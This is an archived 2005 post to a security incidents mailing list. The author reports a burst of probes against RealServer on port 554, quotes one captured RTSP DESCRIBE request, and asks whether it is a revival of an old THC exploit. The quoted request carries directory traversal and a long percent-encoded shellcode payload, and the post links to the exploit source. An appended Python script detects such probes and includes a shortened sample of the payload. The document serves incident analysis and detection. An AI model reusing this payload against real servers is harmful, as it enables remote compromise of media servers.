THC's RealServer (port 554) exploit?

From: Stefan Pettersson (stefan.pets_at_home.se)
Date: 02/16/05

    Date: Wed, 16 Feb 2005 17:53:07 +0100
    To: incidents@securityfocus.com
    
    

    Hi, I'm kinda new in this field, so please bear with me.

    I've got a massive increase on connection requests to port 554 (RealServer) this
    afternoon. I haven't given much thought about earlier connections but when looking
    through the firewall log I see that I've gotten a few in the past as well. There is
    however no doubt that the traffic has increased _greatly_ this afternoon. (Almost)
    every attempt is sent by a different address. I don't know if these are decoys
    though.

    I was curious about this so I opened the port up and ran

    nc -l -p 554 > output

    to see what the probes tried to send. What I got was definitely an exploit attempt.

    DESCRIBE /../../../../ΜΜ%eb%15%b9%8b%e6%13%41%81%f1%39%e6%13%41%5e%80%74%31%ff%9e%e2%f9%eb%05%e8%e6%ff%ff%ff%ad%45%fa%15%dd%ae%15%de%92%15%ee%82%33%15%e6%96%76%db%9e%9e%9e%cd%c8%15%c1%a2%15%c2%a5%e6%9d%41%cd%15%c5%be%9d%41%cd%1d%5d%9a%15%ad%9d%69%ad%57%32%ac%56%5f%5f%9b%1a%5e%eb%68%b5%54%eb%77%c6%b5%46%4f%75%c0%9d%c0%ba%9d%41%f8%15%95%15%c0%82%9d%41%15%9a%15%9d%59%c0%c5%61%7e%c0%f6%ad%ac%9e%9e%f6%e9%ed%ac%c1%ca%24%0c%f0%9a%1a%61%48%15%66%1f%72%9e%9c%9e%9e%15%72%cd%f4%9f%f4%9c%24%1d%cd%1d%9e%61%48%cd%cd%f6%4d%43%8d%24%f6%9c%9e%7e%ec%15%4a%15%46%f4%8e%cc%cd%24%fd%ae%fe%c4%61%48%ce%2a%9c%ce%cb%cd%24%9e%c6%fe%7c%61%48%21%a3%36%27%f3%61%7b.smi RTSP/1.0

    I removed a "few" /../..

    Searching the web for this, I found that this is an old exploit, most likely this
    one:

    http://www.thc.org/exploits/THCrealbad.c

    But that one is almost two years old, so why does it show up this much now? So suddenly.
    It has only been going on for a few hours. Is there something new that has come out,
    or is it just a coincidence?

    Regards,
    Stefan Pettersson
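The kind of triage check a defender could run over a capture like the one above (the file written by `nc -l -p 554 > output`): flag RTSP request lines that combine directory traversal with a %xx-encoded, mostly non-printable URI, which a real media path never has. This is an added example, not code from the post or from THC; the sample capture is constructed and the probe line in it is a shortened imitation of the quoted shape, not the original payload.

```python
"""Flag RTSP DESCRIBE probes: path traversal plus a percent-encoded,
mostly non-printable payload in the request URI (detection only)."""
import re
from urllib.parse import unquote_to_bytes

# Request line per RTSP/1.0: "<METHOD> <URI> RTSP/<major>.<minor>"
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z_]+) (?P<uri>\S+) RTSP/(?P<ver>\d\.\d)$")


def analyze_rtsp_request_line(line: str) -> dict:
    """Return indicators for one RTSP request line (the URI is decoded, never executed)."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return {"valid": False}
    uri = m.group("uri")
    traversal = uri.count("../")
    # Percent-decode the URI: shellcode-style payloads decode to many bytes
    # outside printable ASCII, whereas a legitimate media path decodes cleanly.
    raw = unquote_to_bytes(uri)
    nonprint = sum(1 for b in raw if b < 0x20 or b > 0x7E)
    encoded = len(re.findall(r"%[0-9a-fA-F]{2}", uri))
    suspicious = traversal >= 2 or (encoded >= 16 and nonprint / max(len(raw), 1) > 0.3)
    return {"valid": True, "method": m.group("method"), "traversal": traversal,
            "encoded_bytes": encoded, "nonprintable": nonprint, "suspicious": suspicious}


def scan_capture(text: str) -> list:
    """Run the check over every line of a capture; non-request lines are skipped."""
    results = []
    for line in text.splitlines():
        r = analyze_rtsp_request_line(line)
        if r.get("valid"):
            r["line"] = line[:60]  # short prefix for the report
            results.append(r)
    return results


# Constructed sample capture (not real traffic): two ordinary requests and one
# probe modelled on the traversal-plus-encoded-bytes shape quoted in the post.
SAMPLE_CAPTURE = """\
OPTIONS rtsp://media.example.invalid/movie.rm RTSP/1.0
DESCRIBE rtsp://media.example.invalid/movie.rm RTSP/1.0
DESCRIBE /../../../../%eb%15%b9%8b%e6%13%41%81%f1%39%e6%13%41%5e%80%74%31%ff%9e%e2%f9%eb%05.smi RTSP/1.0
"""

if __name__ == "__main__":
    for r in scan_capture(SAMPLE_CAPTURE):
        print(r)
```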


